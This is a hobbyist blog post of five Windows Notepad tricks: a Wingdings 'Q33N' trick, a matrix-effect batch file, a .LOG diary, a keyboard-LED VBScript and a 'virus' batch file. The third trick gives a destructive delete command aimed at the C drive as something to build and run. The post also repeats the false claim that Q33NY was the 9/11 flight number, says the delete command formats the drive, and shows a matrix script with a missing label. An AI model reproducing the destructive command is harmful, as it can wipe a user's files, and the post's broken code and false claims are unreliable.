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Top 5 Cool Notepad Tricks

notepad tricks
I had previously share some Interesting computer tricks as well as cool Batch file programs. In this post i will share with you guys some of the cool notepad tricks.As name suggest you don't require any program other then notepad. So lets get started.

1. World Trade Center Attack Trick


world trade center trick

The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and TypeQ33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.
  • World Trade Center Notepad Trick

2. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.

@echo off
color 02
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.
  • Matrix Effect Using Notepad

3. Creating Virus That Format C Drive

computer virus
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

4. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.
    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad
  • Make Personal Diary Using Notepad

5. Dancing Keyboard Led

keyboard dancing led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.

Any suggestions OR queries pls Comment. ☻


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